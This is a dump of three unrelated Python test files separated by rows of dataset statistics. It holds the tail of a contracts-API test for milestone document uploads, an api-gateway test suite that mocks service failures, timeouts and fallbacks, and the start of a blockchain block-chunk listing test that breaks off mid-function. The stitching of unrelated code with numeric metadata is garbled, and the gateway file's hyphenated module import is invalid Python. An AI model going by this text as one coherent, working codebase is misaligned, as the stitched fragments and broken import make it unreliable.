{"location": "body", "name": "data",
"description": "Can't add document to scheduled milestone without pending change"}])
# create pending change
response = self.app.post_json('/contracts/{}/changes?acc_token={}'.format(
self.contract_id, self.contract_token), {'data': {
'rationale': u'причина зміни укр',
'rationale_en': 'change cause en',
'rationaleTypes': ['itemPriceVariation']}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['status'], 'pending')
change = response.json['data']
# now loading docs for scheduled milestone is allowed
response = self.app.post_json('/contracts/{}/documents?acc_token={}'.format(
self.contract_id, self.contract_token), {'data': {
'title': u'укр.doc',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/msword',
'documentOf': 'milestone',
'relatedItem': scheduled_milestone['id']}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
self.assertIn(doc_id, response.headers['Location'])
self.assertEqual(u'укр.doc', response.json["data"]["title"])
self.assertEqual('milestone', response.json["data"]["documentOf"])
self.assertEqual(scheduled_milestone['id'], response.json["data"]["relatedItem"])
self.assertIn('Signature=', response.json["data"]["url"])
self.assertIn('KeyID=', response.json["data"]["url"])
self.assertNotIn('Expires=', response.json["data"]["url"])
key = response.json["data"]["url"].split('/')[-1].split('?')[0]
contract = self.db.get(self.contract_id)
self.assertIn(key, contract['documents'][-1]["url"])
self.assertIn('Signature=', contract['documents'][-1]["url"])
self.assertIn('KeyID=', contract['documents'][-1]["url"])
self.assertNotIn('Expires=', contract['documents'][-1]["url"])
response = self.app.get('/contracts/{}/documents/{}'.format(
self.contract_id, doc_id))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(doc_id, response.json["data"]["id"])
self.assertEqual(u'укр.doc', response.json["data"]["title"])
self.assertEqual('milestone', response.json["data"]["documentOf"])
self.assertEqual(scheduled_milestone['id'], response.json["data"]["relatedItem"])
# update docs for scheduled milestone is allowed with pending change
response = self.app.put_json('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token), {'data': {
'title': u'name name.doc',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/msword'}}, status=200)
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(doc_id, response.json["data"]["id"])
self.assertEqual(u'name name.doc', response.json["data"]["title"])
self.assertIn('Signature=', response.json["data"]["url"])
self.assertIn('KeyID=', response.json["data"]["url"])
self.assertNotIn('Expires=', response.json["data"]["url"])
self.assertEqual('milestone', response.json["data"]["documentOf"])
self.assertEqual(scheduled_milestone['id'], response.json["data"]["relatedItem"])
# activate change - now there is no pending changes
response = self.app.patch_json('/contracts/{}/changes/{}?acc_token={}'.format(
self.contract_id, change['id'], self.contract_token), {'data': {
'status': 'active',
'dateSigned': get_now().isoformat()}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['status'], 'active')
# update docs for scheduled milestone is not allowed without pending change
response = self.app.put_json('/contracts/{}/documents/{}?acc_token={}'.format(
self.contract_id, doc_id, self.contract_token), {'data': {
'title': u'name name name.doc',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/msword'}}, status=403)
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'], [
{"location": "body", "name": "data",
"description": "Can't update document to scheduled milestone without pending change"}])
# can't load documents to spare milestone
spare_milestone = self.initial_data['milestones'][-2]
self.assertEqual(spare_milestone['status'], 'spare')
response = self.app.post_json('/contracts/{}/documents?acc_token={}'.format(
self.contract_id, self.contract_token), {'data': {
'title': u'укр.doc',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/msword',
'documentOf': 'milestone',
'relatedItem': spare_milestone['id']}}, status=403)
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'], [
{"location": "body", "name": "data", "description": "Can't add document in current (spare) milestone status"}])
| 53.815851
| 120
| 0.657123
| 2,625
| 23,087
| 5.686095
| 0.057905
| 0.130645
| 0.143307
| 0.048238
| 0.966635
| 0.962214
| 0.953303
| 0.949015
| 0.945531
| 0.942181
| 0
| 0.013212
| 0.164032
| 23,087
| 428
| 121
| 53.941589
| 0.760155
| 0.074198
| 0
| 0.893678
| 0
| 0
| 0.287777
| 0.054978
| 0
| 0
| 0
| 0
| 0.454023
| 1
| 0.005747
| false
| 0
| 0.005747
| 0
| 0.011494
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e3d500bace39d7f1bea13ca84e24558558df805a
| 22,178
|
py
|
Python
|
netflix/services/api-gateway/tests/test_app.py
|
filibuster-testing/filibuster-corpus
|
225ee0017005801bee591137f82117fe37a0f899
|
[
"Apache-2.0"
] | 7
|
2021-11-01T21:09:47.000Z
|
2022-03-16T20:38:57.000Z
|
netflix/services/api-gateway/tests/test_app.py
|
filibuster-testing/filibuster-corpus
|
225ee0017005801bee591137f82117fe37a0f899
|
[
"Apache-2.0"
] | null | null | null |
netflix/services/api-gateway/tests/test_app.py
|
filibuster-testing/filibuster-corpus
|
225ee0017005801bee591137f82117fe37a0f899
|
[
"Apache-2.0"
] | null | null | null |
import requests
import os, sys
import enum
if sys.version_info[0] >= 3 and sys.version_info[1] >= 3:
from unittest import mock
else:
import mock
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
from api-gateway.app import app
parent_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
sys.path.append(parent_path)
import helper
helper = helper.Helper("netflix")
class MockFailure(enum.Enum):
SUCCESS = 0
USER_PROFILE_FAIL = 3
USER_PROFILE_TIMEOUT = 4
USER_PROFILE_NOT_FOUND = 5
BOOKMARKS_FAIL = 6
BOOKMARKS_TIMEOUT = 7
BOOKMARKS_NOT_FOUND = 8
BOOKMARKS_FAIL_TRENDING_FAIL = 9
BOOKMARKS_FAIL_TRENDING_TIMEOUT = 10
BOOKMARKS_FAIL_TELEMETRY_FAIL = 11
BOOKMARKS_FAIL_TELEMETRY_TIMEOUT = 12
MY_LIST_FAIL = 13
MY_LIST_TIMEOUT = 14
MY_LIST_NOT_FOUND = 15
USER_REC_FAIL = 16
USER_REC_TIMEOUT = 17
USER_REC_NOT_FOUND = 18
USER_REC_FAIL_GLOBAL_REC_FAIL = 19
USER_REC_FAIL_GLOBAL_REC_TIMEOUT = 20
USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_FAIL = 21
USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_TIMEOUT = 22
RATINGS_FAIL = 23
RATINGS_TIMEOUT = 24
RATINGS_NOT_FOUND = 25
class MockResponse:
def __init__(self, data, status_code):
self.data = data
self.status_code = status_code
def json(self):
return self.data
def mock_requests_get_with_failure_setting(failure_setting):
def mock_requests_get(*args, **kwargs):
user_profile_request = "{}/users/chris_rivers".format(helper.get_service_url("user-profile"))
if args == (user_profile_request,):
if failure_setting == MockFailure.USER_PROFILE_FAIL:
raise requests.exceptions.ConnectionError
elif failure_setting == MockFailure.USER_PROFILE_TIMEOUT:
raise requests.exceptions.Timeout
elif failure_setting == MockFailure.USER_PROFILE_NOT_FOUND:
status_code = 404
else:
status_code = 200
return MockResponse(USER_PROFILE_RESPONSE, status_code)
bookmarks_request = "{}/users/chris_rivers".format(helper.get_service_url("bookmarks"))
if args == (bookmarks_request,):
if failure_setting in [MockFailure.BOOKMARKS_FAIL, MockFailure.BOOKMARKS_FAIL_TRENDING_FAIL, MockFailure.BOOKMARKS_FAIL_TRENDING_TIMEOUT, MockFailure.BOOKMARKS_FAIL_TELEMETRY_FAIL, MockFailure.BOOKMARKS_FAIL_TELEMETRY_TIMEOUT]:
raise requests.exceptions.ConnectionError
elif failure_setting == MockFailure.BOOKMARKS_TIMEOUT:
raise requests.exceptions.Timeout
elif failure_setting == MockFailure.BOOKMARKS_NOT_FOUND:
status_code = 404
else:
status_code = 200
return MockResponse(BOOKMARKS_RESPONSE, status_code)
trending_request = helper.get_service_url("trending")
if args == (trending_request,):
if failure_setting in [MockFailure.BOOKMARKS_FAIL_TRENDING_FAIL, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_FAIL]:
raise requests.exceptions.ConnectionError
elif failure_setting in [MockFailure.BOOKMARKS_FAIL_TRENDING_TIMEOUT, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_TIMEOUT]:
raise requests.exceptions.Timeout
else:
status_code = 200
return MockResponse(TRENDING_RESPONSE, status_code)
my_list_request = "{}/users/chris_rivers".format(helper.get_service_url("my-list"))
if args == (my_list_request,):
if failure_setting == MockFailure.MY_LIST_FAIL:
raise requests.exceptions.ConnectionError
elif failure_setting == MockFailure.MY_LIST_TIMEOUT:
raise requests.exceptions.Timeout
elif failure_setting == MockFailure.MY_LIST_NOT_FOUND:
status_code = 404
else:
status_code = 200
return MockResponse(MY_LIST_RESPONSE, status_code)
user_rec_request = "{}/users/chris_rivers".format(helper.get_service_url("user-recommendations"))
if args == (user_rec_request,):
if failure_setting in [MockFailure.USER_REC_FAIL, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL, MockFailure.USER_REC_FAIL_GLOBAL_REC_TIMEOUT, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_FAIL, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_TIMEOUT]:
raise requests.exceptions.ConnectionError
elif failure_setting == MockFailure.USER_REC_TIMEOUT:
raise requests.exceptions.Timeout
elif failure_setting == MockFailure.USER_REC_NOT_FOUND:
status_code = 404
else:
status_code = 200
return MockResponse(USER_REC_RESPONSE, status_code)
global_rec_request = helper.get_service_url("global-recommendations")
if args == (global_rec_request,):
if failure_setting in [MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_FAIL, MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_TIMEOUT]:
raise requests.exceptions.ConnectionError
elif failure_setting == MockFailure.USER_REC_FAIL_GLOBAL_REC_TIMEOUT:
raise requests.exceptions.Timeout
else:
status_code = 200
return MockResponse(GLOBAL_REC_RESPONSE, status_code)
ratings_request = "{}/users/chris_rivers".format(helper.get_service_url("ratings"))
if args == (ratings_request,):
if failure_setting == MockFailure.RATINGS_FAIL:
raise requests.exceptions.ConnectionError
elif failure_setting == MockFailure.RATINGS_TIMEOUT:
raise requests.exceptions.Timeout
elif failure_setting == MockFailure.RATINGS_NOT_FOUND:
status_code = 404
else:
status_code = 200
return MockResponse(RATINGS_RESPONSE, status_code)
return mock_requests_get
def mock_requests_post_with_failure_setting(failure_setting):
def mock_requests_post(*args, **kwargs):
telemetry_request = helper.get_service_url("telemetry")
if args == (telemetry_request,):
if failure_setting == MockFailure.BOOKMARKS_FAIL_TELEMETRY_FAIL:
raise requests.exceptions.ConnectionError
elif failure_setting == MockFailure.BOOKMARKS_FAIL_TELEMETRY_TIMEOUT:
raise requests.exceptions.Timeout
else:
status_code = 200
return MockResponse({}, status_code)
return mock_requests_post
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.SUCCESS))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_success(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 200
response = reply.json
assert len(response) == 5
assert response["user-profile"] == USER_PROFILE_RESPONSE
assert response["bookmarks"] == BOOKMARKS_RESPONSE["bookmarks"]
assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
assert response["recommendations"] == USER_REC_RESPONSE["recommendations"]
assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_PROFILE_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_profile_fail(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_PROFILE_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_profile_timeout(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_PROFILE_NOT_FOUND))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_profile_not_found(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 404
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_bookmarks_fail(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 200
response = reply.json
assert len(response) == 5
assert response["user-profile"] == USER_PROFILE_RESPONSE
assert response["trending"] == TRENDING_RESPONSE["trending"]
assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
assert response["recommendations"] == USER_REC_RESPONSE["recommendations"]
assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_bookmarks_timeout(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 200
response = reply.json
assert len(response) == 5
assert response["user-profile"] == USER_PROFILE_RESPONSE
assert response["trending"] == TRENDING_RESPONSE["trending"]
assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
assert response["recommendations"] == USER_REC_RESPONSE["recommendations"]
assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_NOT_FOUND))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_bookmarks_not_found(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 200
response = reply.json
assert len(response) == 5
assert response["user-profile"] == USER_PROFILE_RESPONSE
assert response["trending"] == TRENDING_RESPONSE["trending"]
assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
assert response["recommendations"] == USER_REC_RESPONSE["recommendations"]
assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_FAIL_TRENDING_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_bookmarks_fail_trending_fail(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_FAIL_TRENDING_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_bookmarks_fail_trending_timeout(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_FAIL_TELEMETRY_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.BOOKMARKS_FAIL_TELEMETRY_FAIL))
def test_api_gateway_bookmarks_fail_telemetry_fail(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 200
response = reply.json
assert len(response) == 5
assert response["user-profile"] == USER_PROFILE_RESPONSE
assert response["trending"] == TRENDING_RESPONSE["trending"]
assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
assert response["recommendations"] == USER_REC_RESPONSE["recommendations"]
assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.BOOKMARKS_FAIL_TELEMETRY_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.BOOKMARKS_FAIL_TELEMETRY_TIMEOUT))
def test_api_gateway_bookmarks_fail_telemetry_timeout(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 200
response = reply.json
assert len(response) == 5
assert response["user-profile"] == USER_PROFILE_RESPONSE
assert response["trending"] == TRENDING_RESPONSE["trending"]
assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
assert response["recommendations"] == USER_REC_RESPONSE["recommendations"]
assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.MY_LIST_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_my_list_fail(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.MY_LIST_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_my_list_timeout(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.MY_LIST_NOT_FOUND))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_my_list_not_found(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 404
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_fail(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 200
response = reply.json
assert len(response) == 5
assert response["user-profile"] == USER_PROFILE_RESPONSE
assert response["bookmarks"] == BOOKMARKS_RESPONSE["bookmarks"]
assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
assert response["recommendations"] == GLOBAL_REC_RESPONSE["recommendations"]
assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_timeout(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 200
response = reply.json
assert len(response) == 5
assert response["user-profile"] == USER_PROFILE_RESPONSE
assert response["bookmarks"] == BOOKMARKS_RESPONSE["bookmarks"]
assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
assert response["recommendations"] == GLOBAL_REC_RESPONSE["recommendations"]
assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_NOT_FOUND))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_not_found(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 200
response = reply.json
assert len(response) == 5
assert response["user-profile"] == USER_PROFILE_RESPONSE
assert response["bookmarks"] == BOOKMARKS_RESPONSE["bookmarks"]
assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
assert response["recommendations"] == GLOBAL_REC_RESPONSE["recommendations"]
assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_fail_global_rec_fail(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 200
response = reply.json
assert len(response) == 5
assert response["user-profile"] == USER_PROFILE_RESPONSE
assert response["bookmarks"] == BOOKMARKS_RESPONSE["bookmarks"]
assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
assert response["trending"] == TRENDING_RESPONSE["trending"]
assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_FAIL_GLOBAL_REC_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_fail_global_rec_timeout(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 200
response = reply.json
assert len(response) == 5
assert response["user-profile"] == USER_PROFILE_RESPONSE
assert response["bookmarks"] == BOOKMARKS_RESPONSE["bookmarks"]
assert response["my-list"] == MY_LIST_RESPONSE["my-list"]
assert response["trending"] == TRENDING_RESPONSE["trending"]
assert response["ratings"] == RATINGS_RESPONSE["ratings"]
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_fail_global_rec_fail_trending_fail(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.USER_REC_FAIL_GLOBAL_REC_FAIL_TRENDING_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_user_rec_fail_global_rec_fail_trending_timeout(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.RATINGS_FAIL))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_ratings_fail(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.RATINGS_TIMEOUT))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_ratings_timeout(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 503
@mock.patch('requests.get', side_effect=mock_requests_get_with_failure_setting(MockFailure.RATINGS_NOT_FOUND))
@mock.patch('requests.post', side_effect=mock_requests_post_with_failure_setting(MockFailure.SUCCESS))
def test_api_gateway_ratings_not_found(mock_get, mock_post):
client = app.test_client()
reply = client.get("/homepage/users/chris_rivers")
assert reply.status_code == 404
USER_PROFILE_RESPONSE = {
"id": "chris_rivers",
"name": "Chris Rivers",
"email": "chris_rivers@netflix.com"
}
BOOKMARKS_RESPONSE = {
"bookmarks": [
{
"movie": "Harry Potter and the Philosopher's Stone",
"timecode": "01:20:00"
},
{
"movie": "Harry Potter and the Chamber of Secrets",
"timecode": "00:01:20"
}
]
}
MY_LIST_RESPONSE = {
"my-list": ["Harry Potter and the Prisoner of Azkaban", "Harry Potter and the Goblet of Fire"]
}
USER_REC_RESPONSE = {
"recommendations": ["Harry Potter and the Order of the Phoenix", "Harry Potter and the Half-Blood Prince", "Harry Potter and the Deathly Hallows"],
}
GLOBAL_REC_RESPONSE = {
"recommendations": ["Inception", "Shutter Island", "The Dark Night"]
}
RATINGS_RESPONSE = {
"ratings": [
{
"movie": "Harry Potter and the Philosopher's Stone",
"rating": 5
},
{
"movie": "Twilight",
"rating": 4
}
]
}
TRENDING_RESPONSE = {
"trending": ["The Croods", "Red Dot", "We Can Be Heroes"]
}
| 47.187234
| 268
| 0.739201
| 2,772
| 22,178
| 5.541847
| 0.054113
| 0.066528
| 0.104153
| 0.068741
| 0.890509
| 0.872022
| 0.854837
| 0.843445
| 0.813891
| 0.765135
| 0
| 0.009642
| 0.15822
| 22,178
| 469
| 269
| 47.287846
| 0.81322
| 0
| 0
| 0.535533
| 0
| 0
| 0.134322
| 0.037109
| 0
| 0
| 0
| 0
| 0.228426
| 0
| null | null | 0
| 0.017767
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
549c024986620ad67e449cbc9faab242140578d9
| 9,935
|
py
|
Python
|
thenewboston_node/blockchain/tests/test_list_block_chunks_meta.py
|
fonar/thenewboston-node
|
e8b574b32b3f0ff6d19a764105558ba1f3b31bc2
|
[
"MIT"
] | null | null | null |
thenewboston_node/blockchain/tests/test_list_block_chunks_meta.py
|
fonar/thenewboston-node
|
e8b574b32b3f0ff6d19a764105558ba1f3b31bc2
|
[
"MIT"
] | null | null | null |
thenewboston_node/blockchain/tests/test_list_block_chunks_meta.py
|
fonar/thenewboston-node
|
e8b574b32b3f0ff6d19a764105558ba1f3b31bc2
|
[
"MIT"
] | null | null | null |
from urllib.parse import urlencode
import pytest
from thenewboston_node.business_logic.tests.base import force_blockchain
API_V1_LIST_BLOCKCHAIN_STATE_URL = '/api/v1/block-chunks-meta/'
def test_can_list_block_chunk_meta(api_client, file_blockchain_with_three_block_chunks):
blockchain = file_blockchain_with_three_block_chunks
with force_blockchain(blockchain):
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL)
assert response.status_code == 200
response_json = response.json()
assert len(response_json['results']) == 3
meta_0, meta_1, meta_2 = response_json['results']
assert meta_0 == {
'start_block_number':
0,
'end_block_number':
2,
'url_path': (
'/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000000-00000000000000000002-block-chunk.msgpack.gz'
),
'urls': [
'http://localhost:8555/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000000-00000000000000000002-block-chunk.msgpack.gz'
]
}
assert meta_1 == {
'start_block_number':
3,
'end_block_number':
5,
'url_path': (
'/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000003-00000000000000000005-block-chunk.msgpack.gz'
),
'urls': [
'http://localhost:8555/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000003-00000000000000000005-block-chunk.msgpack.gz'
]
}
assert meta_2 == {
'start_block_number':
6,
'end_block_number':
7,
'url_path': (
'/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000006-xxxxxxxxxxxxxxxxxxxx-block-chunk.msgpack'
),
'urls': [
'http://localhost:8555/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000006-xxxxxxxxxxxxxxxxxxxx-block-chunk.msgpack'
]
}
def test_can_order_block_chunk_meta(api_client, file_blockchain_with_three_block_chunks):
blockchain = file_blockchain_with_three_block_chunks
with force_blockchain(blockchain):
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?ordering=-start_block_number')
assert response.status_code == 200
response_json = response.json()
assert len(response_json['results']) == 3
meta_0, meta_1, meta_2 = response_json['results']
assert meta_2 == {
'start_block_number':
0,
'end_block_number':
2,
'url_path': (
'/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000000-00000000000000000002-block-chunk.msgpack.gz'
),
'urls': [
'http://localhost:8555/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000000-00000000000000000002-block-chunk.msgpack.gz'
]
}
assert meta_1 == {
'start_block_number':
3,
'end_block_number':
5,
'url_path': (
'/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000003-00000000000000000005-block-chunk.msgpack.gz'
),
'urls': [
'http://localhost:8555/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000003-00000000000000000005-block-chunk.msgpack.gz'
]
}
assert meta_0 == {
'start_block_number':
6,
'end_block_number':
7,
'url_path': (
'/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000006-xxxxxxxxxxxxxxxxxxxx-block-chunk.msgpack'
),
'urls': [
'http://localhost:8555/blockchain/block-chunks/0/0/0/0/0/0/0/0/'
'00000000000000000006-xxxxxxxxxxxxxxxxxxxx-block-chunk.msgpack'
]
}
def test_can_order_block_chunk_meta_with_limit(api_client, file_blockchain_with_three_block_chunks):
blockchain = file_blockchain_with_three_block_chunks
with force_blockchain(blockchain):
response = api_client.get(API_V1_LIST_BLOCKCHAIN_STATE_URL + '?ordering=-start_block_number&limit=2')
